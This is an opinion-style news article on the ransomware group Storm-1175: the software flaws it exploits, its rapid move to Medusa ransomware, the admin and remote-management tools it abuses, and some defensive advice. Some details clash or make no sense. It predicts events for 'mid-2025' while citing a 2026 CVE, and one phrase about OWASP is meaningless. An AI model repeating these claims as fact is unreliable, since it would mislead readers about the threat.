What if the next ransomware note on your network arrived before lunch?
Storm-1175 — yeah, that China-linked crew Microsoft’s been tracking — isn’t messing around. They’ve turned zero-days into a blitzkrieg, slamming holes in everything from Ivanti to JetBrains, then dumping Medusa ransomware before you finish your coffee. It’s not hype; it’s happening now, hitting healthcare in the US, schools in the UK, banks Down Under.
Look, I’ve covered this beat for two decades. Back in the early 2000s, we’d see nation-states probe quietly; now these financially motivated operators — with Beijing fingerprints — move at warp speed. Who profits? Not victims. Follow the money: ransomware payouts, data sales on the dark web. But here’s my unique take — this feels like the Conti playbook reborn, post-2022 disbandment, but turbocharged with state-level zero-day access. Conti rotated vulns too, but Storm-1175’s doing it pre-disclosure. Coincidence?
Why Does Storm-1175 Hit Zero-Days Before We Even Know?
They don’t wait for headlines.
Microsoft lays it out cold: “The threat actor’s high operational tempo and proficiency in identifying exposed perimeter assets have proven successful, with recent intrusions heavily impacting healthcare organizations, as well as those in the education, professional services, and finance sectors in Australia, the United Kingdom, and the United States.”
“Storm-1175 rotates exploits quickly during the time between disclosure and patch availability or adoption, taking advantage of the period where many organizations remain unprotected,” Microsoft said.
That’s the quote that chills. CVE-2025-10035 in Fortra GoAnywhere? Zero-day. CVE-2026-23760 in SmarterMail? Same. They’ve chained 16+ vulns since 2023 — Papercut, ConnectWise, even CrushFTP. Linux lovers, watch Oracle WebLogic; they’re probing there too, unknown CVE.
And speed? Foothold to ransomware in 24 hours. Persistence via new users, web shells, legit RMM like ScreenConnect. Credential dumps with Mimikatz. Firewall tweaks for RDP. Defender exclusions. It’s a greatest-hits of LOLBins: PowerShell, PsExec, Impacket.
But PDQ Deployer for lateral moves? That’s slick — blending ransomware delivery into admin tools. Rclone exfils data; Bandizip packs it. No wonder detection sucks.
Is Your RMM Tool the Next Backdoor?
Here’s the thing — RMMs like AnyDesk, Atera, SimpleHelp? Dual-use gold for bad guys.
They tunnel malicious traffic through trusted encryption. Blends right in. I’ve seen this before: SolarWinds was supply-chain; this is tool-chain. Companies push ‘remote management’ without thinking adversaries love it too. Prediction: Expect regs on RMM logging by 2026, or lawsuits will force it. Who’s making bank? Vendors selling ‘secure’ versions post-breach.
Storm-1175’s flair for variety keeps defenders guessing. OWASP RF? Chained for post-comp. Healthcare? Finance? Easy perimeters, fat ransoms.
Cynical me asks: Why Australia-UK-US? English speakers pay quick? Or testing for bigger fish.
Patch gaps kill. They exploit N-days too — known but unpatched. Ivanti CVE-2023-46805? Still biting.
Who’s Actually Paying — And Why Should You Care?
Victims span sectors, but healthcare bleeds most — patient data gold.
Education? Budgets tight, patches lag. Finance? Rep damage huge. One org: Linux WebLogic pwned, unknown vuln. Cross-platform now.
My insight: This mirrors 2017 WannaCry — zero-days (EternalBlue), rapid spread, but targeted. Storm-1175’s not worming; they’re surgical. Bold call: By mid-2025, Medusa variants hit critical infra unless vendors embed auto-patches.
Defenses? Hunt RMM anomalies. Block PDQ if unused. MFA everywhere. But really — segment networks, air-gap crowns.
Microsoft’s right: Tempo wins. They’ve got zero-days fresh; we chase patches.
And the PR spin? Vendors blame users. ‘Patch faster!’ Sure. But disclose zero-days quicker, or fund bug bounties better.
🧬 Related Insights
- Read more: Instant Software Upends Cybersecurity: Who Wins the AI Arms Race?
- Read more: 27 Seconds to Breach: CrowdStrike’s Charlotte AI Hype Check
Frequently Asked Questions
What is Storm-1175?
China-linked threat actor deploying Medusa ransomware via zero-day chains in Ivanti, JetBrains, and more. High-speed attacks, 24-hour ransomware drops.
Does Storm-1175 target Linux systems?
Yes, recently hitting Oracle WebLogic on Linux with unknown vulns, plus Windows everywhere else.
How to stop Medusa ransomware from Storm-1175?
Patch all listed CVEs now, monitor RMM tools, block LOLBins, enforce MFA — and segment your network.
